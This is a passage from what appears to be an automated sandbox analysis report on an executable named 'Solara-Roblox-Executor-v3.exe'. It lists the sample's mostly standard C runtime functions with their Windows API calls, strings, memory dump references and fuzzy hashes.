Opcode Fuzzy Hash: d9bdac0f150399a84f965b2506ed2d360b146b621ea2316c219770fa520c5d6d
Instruction Fuzzy Hash: E1B1D474A04249AFDB1BEF98CC51BEEBBB5BF4D310F144158E8059B292C7719E82CB60

Function 0030446D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00304464,002FA97D,002F9BD4), ref: 0030447B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00304489
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003044A2
SetLastError.KERNEL32(00000000,00304464,002FA97D,002F9BD4), ref: 003044F4

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
Instruction ID: 274bb2ece3b39300186914fdc91070631315c06ae7ec1d727503826cccd72438
Opcode Fuzzy Hash: aa434cc284674cb587b289cd3791fc6455f059de44681006a5815a57a3a7cbb0
Instruction Fuzzy Hash: 1301D47220B7166EF73B2B76BCA5A6B2788EB41774F21023DFA11594F2EF124D469240

Function 002FF1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9B9A4FEF,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF22D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002FF23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00315684,000000FF,?,002FF2B9,002FF1A0,?,002FF355,00000000), ref: 002FF261

Strings

CorExitProcess, xrefs: 002FF237
mscoree.dll, xrefs: 002FF226

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
Instruction ID: 5464d5ac3bc1c5591a60e20b11fddc22f85a8dfb55e9fafc6f0196a3fd278a0f
Opcode Fuzzy Hash: 1ece1702947f741583cb7f3a6271a95d1ff994ac165f927ae4e4d23b2a84e56c
Instruction Fuzzy Hash: AF018F35950669AFDB168F54DC09BEEBBB8FB48B51F044639ED11A22D0DB759900CA80

Function 002F77F2 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 002F77F9
std::_Lockit::_Lockit.LIBCPMT ref: 002F7804
std::_Lockit::~_Lockit.LIBCPMT ref: 002F7872

Part of subcall function 002F76EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002F7707

std::locale::_Setgloballocale.LIBCPMT ref: 002F781F
_Yarn.LIBCPMT ref: 002F7835

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
Instruction ID: 5adf40ed71c8e9dfb4ffe39cf687f58f2dda118b0243193acc01fb2b7f2f8de8
Opcode Fuzzy Hash: c52166765d52a03d462c09ce8c6601537f1f299ab86d8b483541023d6baa8f9b
Instruction Fuzzy Hash: 4F01B175A141199BC70AEF20D9455BDBB66BFD93C0F14006DEA0257391CF349E62CF81

Function 0030F6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC), ref: 0030F6BD
GetLastError.KERNEL32(?,0030F74C,00000000,?,00321E20,?,?,?,0030F683,00000004,InitializeCriticalSectionEx,003190D4,003190DC,00000000,?,0030539C), ref: 0030F6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0030F6EF

Strings

api-ms-, xrefs: 0030F6D4

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
Instruction ID: 673b45aa6e689c056de9bf8afa637749a640298dd0a43d3a058c8046cf782d98
Opcode Fuzzy Hash: a8cf60a207f48df36a2297b03077ed9fe12a0f091135c3aa13dc68e7c475b790
Instruction Fuzzy Hash: F6E04830281209BBEB331B61DC0AF983B589B04B50F254030FE0CA84F1DBA399949584

Function 0030D74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9B9A4FEF,00000000,00000000,?), ref: 0030D7B1

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0030DA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0030DA49
GetLastError.KERNEL32 ref: 0030DAEC

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
Instruction ID: 3b5e2853c1d91fae6da5bf354677a1794b0741c4fb939ec9e5663346d7bf8ad9
Opcode Fuzzy Hash: aa9f92c606b7881ff9c97d88df2c8f2216ea6e581127d4d692cb789f3e545ef3
Instruction Fuzzy Hash: 78D14A75E052489FCB16CFE8C8909EEBBF9FF08314F24416AE455EB291D730A941CB50

Function 00304A73 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00304B3A
___AdjustPointer.LIBCMT ref: 00304B5D
___AdjustPointer.LIBCMT ref: 00304BF9

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
Instruction ID: e832066d6a829be8d56f79a9e342e5fde14eb1a814dce6a6fe3970edab2bb69c
Opcode Fuzzy Hash: f076e848f906efc686ae46eadc9a85d995cdca8f242495f7a7bb77f274220101
Instruction Fuzzy Hash: 645105F2606206AFDB2A8F50D8A1BBAB7A8EF04310F15452DEB45476D1D731EE50CB50

Function 0030B576 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B5DA
__dosmaperr.LIBCMT ref: 0030B5E1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 0030B61B
__dosmaperr.LIBCMT ref: 0030B622

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
Instruction ID: eb89c2a04d00236cf062da9c45ff5c47d17ca447c30883d58747664a0b4fba56
Opcode Fuzzy Hash: 4f495e21f535bafe5933d5322089073cbe43df9b174f513a34f466cd9147fe0b
Instruction Fuzzy Hash: 5F21C271602209AFDB22AF65CCA0CABF7ACFF053647118468F919D75D0E732EC408BA4

Function 002FCA12 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
Instruction ID: 4a8204428d7f047a18e01d8e4f906484216aa2a122bcf44f360b225e75a7b053
Opcode Fuzzy Hash: 4c94a707f6b129384865c5f135a76044c7033cfb0f2b638fbe2cff50eb85eae9
Instruction Fuzzy Hash: DE21807122020EAFDB11EF74CD519BAF7A8EF403A47208524FA16C7550DB71FC608B60

Function 0030C96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0030C976

Part of subcall function 00305801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00306FD5,?,00000000,-00000008), ref: 00305862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030C9CE

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ec15d9fdc9c520507ab4dd1ac4573f666a94cf7f0bdadb3c7771ce7d888ab551
Instruction ID: 86431c51ab962513408612365fffe231b11f54c46717b7f6ea055fd0b1fc018d
Opcode Fuzzy Hash: ec15d9fdc9c520507ab4dd1ac4573f666a94cf7f0bdadb3c7771ce7d888ab551
Instruction Fuzzy Hash: 7A11C4F2A1361D7FE71367B65CADCBF799CDE893947215215F801D5181FA22CD0189B0

Function 00314490 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000), ref: 003144A7
GetLastError.KERNEL32(?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?,?,0030D486,?), ref: 003144B3

Part of subcall function 00314510: CloseHandle.KERNEL32(FFFFFFFE,003144C3,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?), ref: 00314520

___initconout.LIBCMT ref: 003144C3

Part of subcall function 003144E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00314481,003139CC,?,?,0030DB40,?,00000000,00000000,?), ref: 003144F8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?), ref: 003144D8

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
Instruction ID: 8a6193ecb3d0c67ba0887ea8c4fd6cc0f5a06ebac7bcc86c7082a96b920ff16e
Opcode Fuzzy Hash: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
Instruction Fuzzy Hash: 9DF0AC3A511224BBCF271F96EC08AD93F6AFB4D7A1F058514FE1895120DA368861AB90

Function 0030A126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 0030A1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?), ref: 0030A21C

Strings

utf8, xrefs: 0030A2EE

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
Instruction ID: 658267192c86c197c2f7b75b07df88f0ec748f7025e6c9f7368984af5e7cee46
Opcode Fuzzy Hash: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
Instruction Fuzzy Hash: 9C51E435602B05AADB2BAB74AC62BB673ACEF08710F154469F9459B4C1F770ED4087A3

Function 00305170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00305071,?,?,00000000,00000000,00000000,?), ref: 00305195

Strings

MOC, xrefs: 003051A7
RCC, xrefs: 003051AF

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
Instruction ID: a75b7c3fcd5a6599d30866f7b0a95d2a0950c7bdfe87b5d6c4ce8da447aab61d
Opcode Fuzzy Hash: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
Instruction Fuzzy Hash: 50418972901609AFCF16CF94CD91AEEBBB9FF08300F198559FA08A7291D335A960DF51

Function 003049DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00304C53

Strings

csm, xrefs: 00304C75
csm, xrefs: 00304CE6

Memory Dump Source

Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
Instruction ID: 16d26096d88cd589c83425e7f0a1c6741f06e0d2c284a79a4f949a6c62786931
Opcode Fuzzy Hash: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
Instruction Fuzzy Hash: 6A3139B2413208EBCF239F40DC1496E7B66FF48315B1A4259FE140E1A2C332CEA1DB81

Analysis Process: Solara-Roblox-Executor-v3.exePID: 3136, Parent PID: 5344COMMON

Non-executed Functions

Function 0030B1B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B250
GetLocaleInfoW.KERNEL32(?,20001004,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B279
GetACP.KERNEL32(?,?,0030AB6D,?,00000000), ref: 0030B28E

Strings

ACP, xrefs: 0030B1D5
OCP, xrefs: 0030B20B

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
Instruction ID: abcaf97f236f6d72d2a5043d4d062305fce9e4913a61c9d438fdd12d8d4a9a30
Opcode Fuzzy Hash: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
Instruction Fuzzy Hash: BA21C532A02100AADB378F64C925B9FF3AEEF54F50B578824E90ADB294E732DD41C350

Function 0030AA37 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0

GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0030AB3F
IsValidCodePage.KERNEL32(00000000), ref: 0030AB7D
IsValidLocale.KERNEL32(?,00000001), ref: 0030AB90
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0030ABD8
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0030ABF3

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
Instruction ID: 78f7f2b1c54494b9cc86126a0cf5c21d200e17ef3dc06c8e622420efaa23a78a
Opcode Fuzzy Hash: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
Instruction Fuzzy Hash: 27519471A027059FEB12DFA8EC55ABE73B9FF09700F064529E901EB1D0E7709940CB62

Function 00303440 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd

Similarity

API ID:
String ID:
API String ID:
